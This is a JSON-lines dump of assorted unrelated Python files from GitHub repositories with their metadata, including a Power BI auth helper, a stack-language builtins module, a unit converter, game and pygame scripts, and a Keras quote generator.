self._state(\n action='save',\n token_dict=token_dict\n )\n\n return token_dict\n\n def grab_refresh_token(self) -> Dict:\n \"\"\"Grabs a new access token using a refresh token.\n\n ### Returns\n ----\n Dict :\n A token dictionary with a new access token.\n \"\"\"\n\n # Grab a new token using our refresh token.\n token_dict = self.client_app.acquire_token_by_refresh_token(\n refresh_token=self.refresh_token,\n scopes=self.scope\n )\n\n if 'error' in token_dict:\n print(token_dict)\n raise PermissionError(\n \"Permissions not authorized, delete json file and run again.\"\n )\n\n # Save the Token.\n self._state(\n action='save',\n token_dict=token_dict\n )\n\n return token_dict\n","repo_name":"areed1192/power-bi-python-api","sub_path":"powerbi/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":10615,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"77"} +{"seq_id":"39391404446","text":"import pandas as pd\n\n# Read the Excel file\ntry:\n df = pd.read_excel('book1.xlsx')\n\n # Extract the data from specific rows\n timestamps = df.iloc[1::2, 0].reset_index(drop=True)\n text = df.iloc[::2, 0].reset_index(drop=True)\n\n # Create a new DataFrame with the extracted data\n new_df = pd.DataFrame({'Time': timestamps, 'Text': text})\n\n # Save the new DataFrame to a CSV file\n new_df.to_csv('output_file.csv', index=False)\n\nexcept Exception as e:\n print(e)\n print('Error reading/writing file.')","repo_name":"ZafeerMahmood/Cv2Learning","sub_path":"ExelScriptForDataFormating.py","file_name":"ExelScriptForDataFormating.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1937985576","text":"class Solution:\n def treeToDoublyList(self, root: 'Node') -> 'Node':\n if not root:\n return None\n dummy = Node(-1)\n pre = dummy\n stack = []\n while stack or root:\n while root:\n stack.append(root)\n root = root.left\n cur = stack.pop()\n pre.right = cur\n cur.left = pre\n pre = cur\n root = cur.right\n head = dummy.right\n head.left = pre\n pre.right = head\n return head","repo_name":"zengtian006/LeetCode","sub_path":"Tree/Leetcode 426. Convert Binary Search Tree to Sorted Doubly Linked List.py","file_name":"Leetcode 426. Convert Binary Search Tree to Sorted Doubly Linked List.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"77"} +{"seq_id":"21888198409","text":"\"\"\"\n\n Builtin function definitions.\n\n\n Note that many words are defined like:\n\n @define('int')\n def _int(...):\n ...\n\n with the leading underscore so that we don't overwrite builtins.\n\"\"\"\n\nimport sys\n\nfrom cat.namespace import define\n\n\n@define('+')\n@define('add')\n@define('str_cat')\ndef add(cat):\n \"\"\"\n add : (nbr nbr -> nbr)\n\n desc:\n adds top two numbers on the stack returning the sum on top of the stack\n Note that if instead of numbers one has other objects such as strings\n or lists, they will be concatenated.\n\n tags:\n level0,mathematics\n \"\"\"\n a, b = cat.pop_2()\n return cat.push(b + a)\n\n\n@define('-')\ndef sub(cat):\n \"\"\"\n sub : (nbr nbr -> nbr)\n\n desc:\n subtracts the number at [0] from that at [-1] returning\n the difference to the top of the stack.\n\n tags:\n level0,mathematics\n \"\"\"\n a, b = cat.pop_2()\n cat.push(b - a)\n\n\n@define('*')\ndef mul(cat):\n \"\"\"\n mul : (nbr nbr -> nbr)\n\n desc:\n multiplies together the top two numbers on the stack. Result is placed\n on top of the stack. Note if the lower \"number\" is a string or a list\n it is replicated according to the standard Python rules.\n\n tags:\n level0,mathematics\n \"\"\"\n a, b = cat.pop_2()\n cat.push(a * b)\n\n\n@define('/')\ndef div(cat):\n \"\"\"\n div : (nbr nbr -> nbr)\n\n desc:\n The number at [0] is divided into the number at [-1] and the\n quotient is pushed onto the stack.\n\n tags:\n level0,mathematics\n \"\"\"\n a, b = cat.pop_2()\n cat.push(b / a)\n\n\n@define('+rot')\ndef _rotUp(stack):\n '''\n +rot : (any:a any:b any:c -> any:c any:a any:b)\n\n desc:\n rotates the top three elements upward one position circularly\n\n tags:\n level0,stack\n '''\n if stack.length() < 3:\n raise Exception(\"+rot: Expect at least three elements on the stack\")\n\n t, m, b = stack.pop_n(3)\n stack.push((t, b, m), multi=True)\n\n\n@define('-rot')\ndef _rotDown(stack):\n '''\n -rot : (any:a any:b any:c -> any:b any:c any:a)\n\n desc:\n rotates the top three elements downward one position circularly\n\n tags:\n level0,stack\n '''\n if stack.length() < 3:\n raise Exception(\"-rot: Expect at least three elements on the stack\")\n\n t, m, b = stack.pop_n(3)\n stack.push((m, t, b), multi=True)\n\n\n@define('not')\ndef _not(stack):\n '''\n not : (bool -> bool)\n\n desc:\n returns True if the top value on the stack is False and vice versa\n\n tags:\n level0,boolean\n '''\n stack.stack[-1] = not stack.stack[-1]\n\n\n@define('while')\ndef _while(stack):\n '''\n while : (func func:test -> any|none)\n\n desc:\n executes a block of code (function) repeatedly until the condition returns false\n Example: func test while\n\n tags:\n level1,control\n '''\n b, f = stack.pop_2()\n\n while (stack.eval(b), stack.pop())[1]:\n stack.eval(f)\n\n\n@define('list')\ndef _list(cat):\n '''\n list : ([...] -> list)\n\n desc:\n creates a list from a function\n\n tags:\n level0,lists\n '''\n\n func = cat.pop()\n with cat.new_stack():\n cat.eval(func)\n lst = cat.to_list()\n cat.push(lst)\n\n\n@define('#types')\ndef _type(stack):\n '''\n #types : (-> list)\n\n desc:\n prints a list of types represented by elements on the stack\n in the same order as the element on the stack with the deepest\n item first and the top item last\n\n tags:\n custom,types,stack\n '''\n typeList = []\n\n for item in stack.stack:\n typeList.append(type(item))\n\n stack.output(str(typeList), 'green')\n\n\n@define('int')\ndef _int(cat):\n '''\n int : (obj -> int)\n\n desc:\n casts the object on top of the stack to an integer\n\n tags:\n level1,math,conversion\n '''\n cat.stack.push(int(cat.stack.pop()))\n\n\n@define('float')\ndef _float(cat):\n '''\n float : (obj -> float)\n\n desc:\n casts the object on top of the stack to as floating point number\n\n tags:\n level1,math,conversion\n '''\n cat.stack.push(float(cat.stack.pop()))\n\n\n@define('#pdb')\ndef _pdb(cat):\n '''\n #pdb : (-- -> --)\n\n desc:\n turns on the pdb flag in the REPL\n\n tags:\n custom,system,debugging\n '''\n cat.toggle_pdb()\n #toggle_pdb()\n\n\n@define('and')\ndef _and(stack):\n '''\n and : (bool bool -> bool)\n\n desc:\n returns True if both of the top two values on the stack are True\n\n tags:\n level0,boolean\n '''\n a, b = stack.pop_2()\n stack.push(a and b)\n\n\n@define('or')\ndef _or(stack):\n '''\n or : (bool bool -> bool)\n\n \"desc:\n returns True if either of the top two values on the stack are True\n\n tags:\n level0,boolean\n '''\n a, b = stack.pop_2()\n stack.push(a or b)\n\n\n@define('#import')\ndef _import(stack):\n '''\n #import : (string:module_name -> --)\n\n desc:\n imports the named module for use by the program\n Note: members of the module are accessed with this notation: .\n parameters must precede the function call as a list with arguments in the order\n required by the function. E.g. ([base expt] list math.pow -> base^expt)\n Example: 'math #import\n 'os #import\n 'localModule #import\n\n tags:\n custom,module,import\n '''\n what = stack.pop()\n\n if isinstance(what, basestring):\n sys.modules[what] = __import__(what)\n\n else:\n raise Exception(\"#import The module name must be a string\")\n\n\n@define('#trace')\ndef _trace(cat):\n '''\n #trace: (-- -> --)\n\n desc:\n toggles the global tracing flag to enable simple tracing of function\n execution.\n\n tags:\n custom,debugging\n '''\n # This will fail. Needs fixing.\n cat.toggle_trace()\n\n\n@define('>>')\ndef _rightShift(stack):\n '''\n >> : (int:base int:n -> int)\n\n descr:\n performs a right shift of n bits on a base integer\n\n tags:\n level0,math\n '''\n n, val = stack.pop_2()\n stack.push(int(val) >> n)\n\n\n@define('<<')\ndef _leftShift(stack):\n \"\"\"'\n << : (int:base int:n -> int)\n\n descr:\n performs a left shift of n bits on a base integer\n\n tags:\n level0,math\n \"\"\"\n n, val = stack.pop_2()\n stack.push(int(val) << n)\n\n\n@define('divmod')\n@define('/%')\n@define('%/') # Are you sure you've got enough aliases there?\ndef _divmod(stack):\n '''\n divmod : (nbr nbr -> nbr nbr)\n /% : (nbr nbr -> nbr nbr)\n\n desc:\n applies divmod function to top two members on stack. Number on top\n is the modulus. Returns quotient, remainder on stack (remainder on top).\n\n tags:\n level0,mathematics\n '''\n a, b = stack.pop_2()\n stack.push(divmod(b, a), multi=True)\n\n\n@define('inc')\n@define('++')\ndef inc(cat):\n '''\n inc : (nbr -> nbr)\n\n desc:\n increments the number on top ofthe stack by 1\n\n tags:\n level0,mathematics\n '''\n cat.stack.push(cat.stack.pop() + 1)\n\n\n@define('dec')\n@define('--')\ndef dec(cat):\n '''\n dec : (nbr -> nbr)\n\n desc:\n decrements the number on top ofthe stack by 1\n\n tags:\n level0,mathematics\n '''\n cat.stack.push(cat.stack.pop() - 1)\n\n\n@define('mod')\n@define('%')\ndef mod(cat):\n '''\n mod : (nbr nbr -> nbr)\n\n desc:\n applies modulus function to top two members on stack. Number at [0]\n is the modulus.\n\n tags:\n level0,mathematics\n '''\n a, b = cat.stack.pop_2()\n cat.stack.push(b % a)\n\n\n@define('pwr')\n@define('**')\ndef pwr(stack):\n '''\n pwr : (nbr:base nbr:expt -> nbr)\n\n desc:\n base**expt is pushed onto the stack\n\n tags:\n level0,math\n '''\n expt, base = stack.pop_2()\n\n if isinstance(base, basestring):\n base = eval(base)\n\n if not isinstance(base, (int, long, float)):\n raise ValueError(\"pwr: The base must be a number\")\n\n if isinstance(expt, basestring):\n expt = eval(expt)\n\n if not isinstance(expt, (int, long, float)):\n raise ValueError(\"expt: The exponent must be a number\")\n\n stack.push(base ** expt)\n\n\n@define('round')\ndef round(stack):\n '''\n round : (float:nbr int:dp -> float:nbr)\n\n desc:\n rounds the floating point number at [-1] to the number of\n decimal places specified by the integer at [0]\n\n tags:\n level1,mathematics\n '''\n dp, nbr = stack.pop_2()\n\n if not isinstance(nbr, float):\n nbr = float(nbr)\n\n dp = int(dp)\n\n stack.push(round(nbr, dp))\n\n\n@define('abs')\ndef _abs(stack):\n '''\n abs : (nbr -> nbr)\n\n desc:\n replaces the number on top of the stack with its absolute value\n\n tags:\n level1,mathematics\n '''\n nbr = stack.pop()\n\n if isinstance(nbr, basestring):\n nbr = eval(nbr)\n\n if isinstance(nbr, (int, long, float)):\n stack.push(abs(nbr))\n\n else:\n raise ValueError(\"abs: Argument is not a number\")\n\n\n@define('all')\ndef _all(stack):\n '''\n all : (list -> bool)\n\n desc:\n returns true on top of the stack if all of the elements of the\n list on top of the stack are true\n\n tags:\n custom,mathematics\n '''\n stack.push(all(stack.pop_list()))\n\n\n@define('any')\ndef _any(stack):\n '''\n any : (list -> bool)\n\n desc:\n Returns true on top of the stack if any element of the list\n on top of the stack is true\n\n tags:\n custom,lists\n '''\n stack.push(any(stack.pop_list()))\n\n\n@define('chr')\ndef _chr(stack):\n '''\n chr : (int -> string)\n\n desc:\n converts the integer on top of the stack to a single character string\n\n tags:\n custom,string\n '''\n val = stack.pop()\n\n if isinstance(val, str) and val.isdigit():\n val = int(val)\n\n if isinstance(val, float):\n val = int(val)\n\n if isinstance(val, (int, long)):\n stack.push(chr(val))\n\n else:\n raise ValueError(\"chr: Cannot convert argument to an integer\")\n\n\n@define('enum')\ndef _enum(stack):\n '''\n enum : (list int:start -> list)\n\n desc:\n returns an enumerated list on top of the stack based on the\n starting int at [0] and the list at [-1] on the stack\n\n tags:\n custom,lists\n '''\n start, lst = stack.pop_2()\n\n if isinstance(start, (str, float)):\n start = int(start)\n\n if not isinstance(start, (int, long)):\n raise ValueError(\"enum: Starting value must be an integer\")\n\n if isinstance(lst, str):\n lst = eval(lst)\n\n if not isinstance(lst, (list, tuple)):\n raise ValueError(\"enum: The list must be an iterable or convertable to one\")\n\n stack.push([[x, y] for x, y in enumerate(lst, start)])\n\n\n@define('hash')\ndef _hash(stack):\n '''\n hash : (any -> int)\n\n desc:\n pushes the hash value of the object on top of the stack onto the stack\n\n tags:\n custom,math\n '''\n stack.push(hash(stack.pop()))\n\n\n@define('id')\ndef id(stack):\n '''\n id : (any -> any int:id)\n\n desc:\n calculates a unique integer id for the object on top of\n the stack and then pushes this id onto the stack. This id\n is unique as long as the session lasts. A new session will\n produce a different id.\n\n tags:\n custom,math\n '''\n stack.push(id(stack.peek()))\n\n\n@define('ord')\ndef _ord(stack):\n '''\n ord : (string:chr -> int)\n\n desc:\n takes the single character string (or first character of a longer string)\n and pushes the integer code for that character onto the stack\n\n tags:\n custom,string,math\n '''\n obj = stack.pop()\n\n if isinstance(obj, (list, tuple)):\n obj = obj[0]\n\n if not isinstance(obj, str):\n obj = str(obj)\n\n stack.push(ord(obj[0]))\n\n\n@define('sort')\ndef _sort(stack):\n '''\n sort : (list -> list)\n\n desc:\n sorts the list on top of the stack in place\n\n tags:\n custom,sort,list\n '''\n stack.push(sorted(stack.pop()))\n","repo_name":"AndrewNelis/catlang","sub_path":"defs/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":12107,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"38831437908","text":"\"\"\"\nCreated on Tue Apr 23 13:08:33 2019\n\n@author: dan\n\"\"\"\n\nfrom PIL import Image, ImageOps\n\nSIZE = 16 \ne = 2.78\nMIN = 0.12\n\nclass NotAnImage(ValueError):\n pass\n\ndef σ(x):\n return 1 / (1 + e**(-x))\n\ndef compare(img1, img2):\n D = []\n for x in range(SIZE)[SIZE//4:-SIZE//4]:\n for y in range(SIZE)[SIZE//4:-SIZE//4]:\n p1 = img1.getpixel((x,y))\n p2 = img2.getpixel((x,y))\n a = σ(p1 / 255)\n b = σ(p2 / 255)\n D += [(a-b)**2]\n# print(D)\n return sum(D)**1/2\n\ndef getthumb(filename):\n try:\n return ImageOps.grayscale(Image.open(filename).resize(size = (SIZE,SIZE), resample = Image.HAMMING))\n except OSError:\n raise NotAnImage()\n\nif __name__ == '__main__':\n try:\n import sys\n assert len(sys.argv) > 2\n img1, img2 = sys.argv[1], sys.argv[2]\n i1 = getthumb(img1)\n i2 = getthumb(img2)\n x = compare(i1, i2)\n print(\"%s <=> %s (%s) %s\" % (img1, img2, round(x,2), \"да\" if x < 0.07 else \"похожи\" if x < 0.7 else \"нет\"))\n except AssertionError:\n print(\"Usage\")\n except FileNotFoundError:\n print(\"FileNotFound\", file=sys.stderr)\n exit(2)","repo_name":"daniel-kurushin/arm-quantum","sub_path":"old/camera/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"10573630706","text":"import asyncio\nfrom util import async_timed\n\n\n# Запустим конкурентно две корутины и увидим, что все вместе выполнилось за 3 секунды.\n\n@async_timed()\nasync def delay(delay_seconds: int) -> int:\n print(f\"Засыпаю на {delay_seconds} c\")\n await asyncio.sleep(delay_seconds)\n print(f\"сон в течение {delay_seconds} c закончился\")\n return delay_seconds\n\n\n@async_timed()\nasync def main():\n task_one = asyncio.create_task(delay(2))\n task_two = asyncio.create_task(delay(3))\n\n await task_one\n await task_two\n\nasyncio.run(main())","repo_name":"NikitaRadionov/asyncio_learning","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34066939492","text":"#!usr/bin/env\r\n\r\nimport pygame, sys\r\nfrom pygame.locals import *\r\n\r\nfrom screen import Screen\r\nfrom event import EventListener\r\nfrom scene import Scene\r\n\r\nWINDOW_WIDTH=1000\r\nWINDOW_HEIGHT=480\r\n\r\npygame.init()\r\n\r\nfpsClock = pygame.time.Clock()\r\n\r\nwindowSurfaceObj = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT), pygame.DOUBLEBUF)\r\npygame.display.set_caption(\"Street Pirates Vs. Ninja\")\r\n\r\nscene = Scene([ [100, 0, 100], [-100, 0, 0] ])\r\nscreen = Screen(windowSurfaceObj, scene)\r\nlistener = EventListener(scene)\r\n\r\nwhile True:\r\n #print \"1\", scene._players[0].position()\r\n #print \"2\", scene._players[1].position()\r\n scene.update()\r\n listener.listen()\r\n screen.draw()\r\n fpsClock.tick(30)\r\n\r\n","repo_name":"ClubEngine/GameJam4","sub_path":"dev/testsaut.py","file_name":"testsaut.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"32905854746","text":"import pandas as pd\nimport re\nimport numpy as np\nimport pkuseg\n\ndata = pd.read_csv('d://processed4news.tsv', sep='\\t', encoding='utf-8', index_col=False)\ndata.columns = ['label', 'content']\n\n#data.head(10)\n\n#%%\n \ndata['cut_words'] = ' '\nseg = pkuseg.pkuseg() # 程序会自动下载所对应的细领域模型\nfor i in range(len(data)): \n \n cn = \"\".join(uncn2.findall(data['content'][i].lower()))#取中文\n cn=seg.cut(cn)\n \n data['cut_words'][i] = cn\n\n\n# In[9]:\n#data.head(10)\n#print(data['cut_words'][4])\n\n# In[10]:\n\n\n# 将数据分成训练集,验证集,测试集三部分\ntrain, val, test = np.split(data.sample(frac=1), [int(.6*len(data)), int(.8*len(data))])\n\n\n# In[11]:\n\n\n# 保存数据\ntest.to_csv('d://test.tsv', sep='\\t', encoding='utf-8', index=False)\ntrain.to_csv('d://train.tsv', sep='\\t', encoding='utf-8', index=False)\nval.to_csv('d://dev.tsv', sep='\\t', encoding='utf-8', index=False)\n\n\n## In[12]:\n#\n#\n## 查看数据分布情况\n#data.groupby(['label']).count()\n#\n#\n## In[43]:\n#\n#\n#data['cut_words_count'] = data['cut_words'].apply(lambda x: len(x.split()))\n#\n#\n## In[49]:\n#\n#\n#data.describe()\n#\n#\n## In[50]:\n#\n#\n#data.head()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n#google_translate_EtoC(words['content'][519])\n#words['content'][519]\n\n\n# In[57]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"wyhwhy/text-classification","sub_path":"data preprocessing/google translate+Chinese pkuseg word segmentation/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"6601816178","text":"from time import sleep\n\nwizard = {\n 'name': 'Wizard',\n 'hp': 70,\n 'damage': 150,\n 'killMessage': 'decimates the dragon with masterful use of the arcane.',\n 'damageType': 'magic'\n}\nelf = {\n 'name': 'Elf',\n 'hp': 100,\n 'damage': 100,\n 'killMessage': 'aims carefully, and with the skill of a master marksman, fells the dragon with shots aimed true.',\n 'damageType': 'piercing'\n}\nhuman = {\n 'name': 'Human',\n 'hp': 150,\n 'damage': 20,\n 'killMessage': 'slays the dragon through sheer will and unwavering bravery, with a mighty blow of the sword.',\n 'damageType': 'bludgeoning'\n}\n\ndragon = {\n 'name': 'Dragon',\n 'hp': 300,\n 'damage': 50,\n 'killMessage': 'into a pile of soot and ash, and lives to kill another day.',\n 'damageType': 'slashing and fire'\n}\n\norc = {\n 'name': 'Orc',\n 'hp': 300,\n 'damage': 51,\n 'killMessage': \"arcs their axe with the force of their ancestors behind them, and the dragon's head is parted from its body.\",\n 'damageType': 'slashing'\n}\n\n\n# function to simulate the fight\ndef fight(player, char):\n playerDamage = char[\"damage\"]\n playerHp = char[\"hp\"]\n enemyDamage = dragon['damage']\n enemyHp = dragon['hp']\n\n while True:\n enemyHp -= playerDamage\n print(\n f'\\n{player} damaged the dragon for {playerDamage} {char[\"damageType\"]} damage!')\n print(f'The dragon has {enemyHp} remaining health.')\n sleep(2.5)\n if enemyHp <= 0:\n print(f'\\n{player} {char[\"killMessage\"]}')\n break\n\n playerHp -= enemyDamage\n print(\n f'\\nThe dragon attacks {player} for {enemyDamage} {dragon[\"damageType\"]} damage!')\n print(f'{player} has {playerHp} remaining health.')\n sleep(2.5)\n if playerHp <= 0:\n print(f'\\nThe dragon torches {player} {dragon[\"killMessage\"]}')\n break\n\n\n# function to input a non empty character name\ndef nameChar(character):\n while True and character != '5' and character != 'exit':\n playerName = input(\n f'Please enter the name of your {character[\"name\"].lower()}: ')\n playerName = playerName.capitalize()\n if playerName != '':\n break\n else:\n print(\"Please enter a name!\")\n return playerName\n\n\ndef startGame():\n print('Here are the following heroes of Exandria:')\n print('1) Wizard')\n print('2) Elf')\n print('3) Human')\n print('4) Orc')\n print('5) Exit the Game')\n character = input(\"Enter your choice of character or exit the game:\")\n return character.lower()\n","repo_name":"DChase-Cad/python","sub_path":"1-Fundamentals/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31861045347","text":"#-*-coding:utf-8-*-\n\n'''学习如何读写excel中的数据,使用到的模块有xrld、xlwt、xlutis'''\nimport xlrd,xlwt\n\nfrom xlutils.copy import copy\n\nfont = xlwt.easyxf('font:color-index red ,bold on')\nheaderStyle = font\noldwb = xlrd.open_workbook('erpdata1.xls',formatting_info=True) #保持原excel文档格式不变\nnewwb = copy(oldwb) #copy从打开的xlrd的book变量中,拷贝出一份成为新的xlwt的WorkBook变量\nnewws = newwb.get_sheet(2) #通过get_sheet去获得对应的sheet\nnewws.write(1,6,'通过'.decode('gbk')) #写入新数据,注意此处中文必须解码\n#写入完成后,需要保存\nnewwb.save('erpdata1.xls')\n","repo_name":"chuju320/Lianxi","sub_path":"lianxi/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11751194412","text":"#creates a new string, that will store the character you have written\nimport pygame\nimport time\n\npygame.init()\n\nscreen_width = 1600\nscreen_height = 800\n\nwhite = (255,255,255)\nblack = (0,0,0)\n\nscreen = pygame.display.set_mode((screen_width,screen_height)) \n\npygame.display.set_caption(\"Type Attack\")\nclock = pygame.time.Clock()\n\nnumber_str = \"\" \n\n#create a new Font object that is used to render the string into a Surface object\nfont_renderer = pygame.font.Font(\"freesansbold.ttf\", 15) \n\nwhile True:\n screen.fill(black) # fill the whole screen with a black color\n # create a new Surface object from a string, where the text is white.\n rendered_number = font_renderer.render(number_str, True, white)\n\n #draws the created Surface onto the screen at position 100,100\n screen.blit(rendered_number, (100, 100))\n # updates the screen to show changes\n pygame.display.flip()\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN: \n if pygame.K_a <= event.key <= pygame.K_z: # checks the key pressed\n character = chr(event.key) #converts the number to a character\n number_str += str(character) #adds the number to the end of the string\n","repo_name":"jackkleeman/TypeAttack","sub_path":"real time writing.py","file_name":"real time writing.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13992790169","text":"from decimal import Decimal, getcontext\n\nfrom unitconverter.exceptions import CategoryError, UnitError\nfrom unitconverter.formatting import parse_decimal\nfrom unitconverter.parser import parse_unit\nfrom unitconverter.registry import get_category\nfrom unitconverter.unit import Unit\n\n\n# Set decimal precision\ngetcontext().prec = 15\n\n\ndef convert(value: Decimal | int | str, source: Unit | str, dest: Unit | str) -> Decimal:\n \"\"\" Convert value from source unit to destination unit.\n\n Parameters\n ----------\n value : Decimal | int | str\n value to convert\n\n source : Unit | str\n source unit or name\n\n dest : Unit | str\n destination unit or name\n\n Returns\n -------\n Decimal\n result of the conversion\n\n Raises\n ------\n UnitError\n the source or dest unit is invalid\n\n CategoryError\n the units are not compatible\n \"\"\"\n value = parse_decimal(value)\n source = parse_unit(source)\n dest = parse_unit(dest)\n\n source_category = get_category(source)\n dest_category = get_category(dest)\n\n if not compatible_units(source_category, dest_category):\n raise CategoryError(f'Category mismatch: {source.name} ({source_category})'\n f' and {dest.name} ({dest_category})')\n\n # Fuel conversion\n if source_category in FUEL_CATEGORY:\n return convert_fuel(value, source, dest)\n\n # Temperature conversion\n elif source_category == 'temperature':\n return convert_temperature(value, source, dest)\n\n # Regular conversion\n value = value * source.factor\n return value / dest.factor\n\n\ndef convert_temperature(value: Decimal, source: Unit, dest: Unit) -> Decimal:\n \"\"\" Convert temperature units. \"\"\"\n value = parse_decimal(value)\n source = parse_unit(source)\n dest = parse_unit(dest)\n\n # Convert from source to kelvin\n if source.name.endswith('kelvin'):\n value = value * source.factor\n elif source.name == 'celsius':\n value = value + Decimal('273.15')\n elif source.name == 'fahrenheit':\n value = (value + Decimal('459.67')) * Decimal(5) / Decimal(9)\n elif source.name == 'rankine':\n value = value * Decimal(5) / Decimal(9)\n else:\n raise UnitError(f'Invalid temperature unit: {source.name}')\n\n # Convert from kelvin to dest\n if dest.name.endswith('kelvin'):\n return value / dest.factor\n elif dest.name == 'celsius':\n return value - Decimal('273.15')\n elif dest.name == 'fahrenheit':\n return value * Decimal(9) / Decimal(5) - Decimal('459.67')\n elif dest.name == 'rankine':\n return value * Decimal(9) / Decimal(5)\n else:\n raise UnitError(f'Invalid temperature unit: {dest.name}')\n\n\ndef convert_fuel(value: Decimal, source: Unit, dest: Unit) -> Decimal:\n \"\"\" Convert between fuel economy and fuel consumption units. \"\"\"\n value = parse_decimal(value)\n source = parse_unit(source)\n dest = parse_unit(dest)\n\n if source.dimension not in FUEL_CATEGORY:\n raise UnitError(f'Invalid fuel unit: {source}')\n\n if dest.dimension not in FUEL_CATEGORY:\n raise UnitError(f'Invalid fuel unit: {dest}')\n\n # Invert fuel consumption (litre/metre) and fuel economy (metre/litre)\n if source.dimension != dest.dimension:\n value = 1 / (value * source.factor)\n return value / dest.factor\n\n # Convert fuel units normally\n value = value * source.factor\n return value / dest.factor\n\n\ndef compatible_units(source_category: str, dest_category: str) -> bool:\n \"\"\" Returns True if the unit categories are compatible. \"\"\"\n if source_category == dest_category:\n return True\n elif source_category in FUEL_CATEGORY and dest_category in FUEL_CATEGORY:\n return True\n return False\n\n\n# Compatible fuel categories\nFUEL_CATEGORY = ('fuel economy', 'fuel consumption')\n","repo_name":"Emetophobe/unitconverter","sub_path":"unitconverter/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18607455646","text":"import json\nimport os\nimport random\nfrom typing import List\n\nimport gensim\nfrom fuzzywuzzy import process, fuzz\nimport keras\nimport numpy as np\nimport requests\n\n\n\ndef searcher(q: str, full_text: List[str], cutoff=85) -> List[str]:\n def custom_ratio(s1, s2):\n fratio = fuzz.UWRatio(s1, s2)\n if s1[0].lower() != s2[0].lower():\n fratio -= 25\n else:\n fratio += 10\n return fratio\n\n quotes_indices = []\n\n for i, sent in enumerate(full_text):\n try:\n if process.extractBests(q, filter(lambda x: abs(len(q)-len(x)) < 2 and len(x) > 2, sent.split()),\n score_cutoff=cutoff, scorer=custom_ratio):\n quotes_indices.append(i)\n except IndexError:\n continue\n\n return quotes_indices\n\n\ndef ending_decider(l: int, word_no_ending: str) -> str:\n ten_reminder = l % 10\n if ten_reminder == 1 and l != 11:\n return word_no_ending + 'у'\n elif ten_reminder in {2, 3, 4} and l not in {12, 13, 14}:\n return word_no_ending + 'ы'\n else:\n return word_no_ending\n\n\nclass QuotesModel:\n def __init__(self):\n self.model = keras.models.load_model('good_model.h5')\n self.word_model = gensim.models.Word2Vec.load('w2v.model')\n self.vars = json.loads(open('variables.json', 'r').read())\n\n def word2idx(self, word):\n return self.word_model.wv.key_to_index[word]\n\n def idx2word(self, idx):\n return self.word_model.wv.index_to_key[idx]\n\n def sample(self, predictions, temperature=0.75):\n if temperature <= 0:\n return np.argmax(predictions)\n predictions = np.asarray(predictions).astype('float64')\n predictions = np.log(predictions) / temperature\n exp_predictions = np.exp(predictions)\n predictions = exp_predictions / np.sum(exp_predictions)\n probas = np.random.multinomial(1, predictions, 1)\n\n return np.argmax(probas)\n\n def generate_next(self, num_generated=10, temp=0.75) -> str:\n text = random.choice(self.vars['beginings'])\n word_idxs = [self.word2idx(word) for word in text.lower().split()]\n\n for _ in range(num_generated):\n prediction = self.model.predict(x=np.array(word_idxs))\n idx = self.sample(prediction[-1], temperature=temp)\n word_idxs.append(idx)\n\n return ' '.join(self.idx2word(idx) for idx in word_idxs)\n\n def translate_generated(self, t: float, words: int, folder_id: str = os.getenv('FOLDER_ID', \"b1geh42nvb0dfevai47f\"),\n texts: list = [], targetLanguageCode: str = \"ru\") -> str:\n body = {\n \"folder_id\": folder_id,\n \"texts\": texts if texts\n else [self.generate_next(temp=t, num_generated=words) for _ in range(5)],\n \"targetLanguageCode\": targetLanguageCode\n }\n\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"API-Key {os.getenv('YA_TOKEN')}\"\n }\n\n resp = requests.post(\"https://translate.api.cloud.yandex.net/translate/v2/translate\",\n data=str(body), headers=headers)\n\n if resp.ok:\n for i in resp.json()['translations']:\n if ',' in i['text']:\n return (200, i['text'])\n return (200, i['text'])\n else:\n return (400, resp.json()['message'])\n","repo_name":"WannaFight/slepaya-bot","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40542086914","text":"import gs\r\nimport logging\r\nimport sqlite3\r\nimport sys\r\nimport time\r\nimport ws_client\r\n\r\ndef handle_unhandled_exceptions(exc_type, exc_value, exc_traceback):\r\n if issubclass(exc_type, KeyboardInterrupt):\r\n sys.__excepthook__(exc_type, exc_value, exc_traceback)\r\n return\r\n for _ in range(100):\r\n try:\r\n ws_client.main()\r\n except:\r\n continue\r\n else:\r\n break\r\n logging.critical('Unhandled exception', 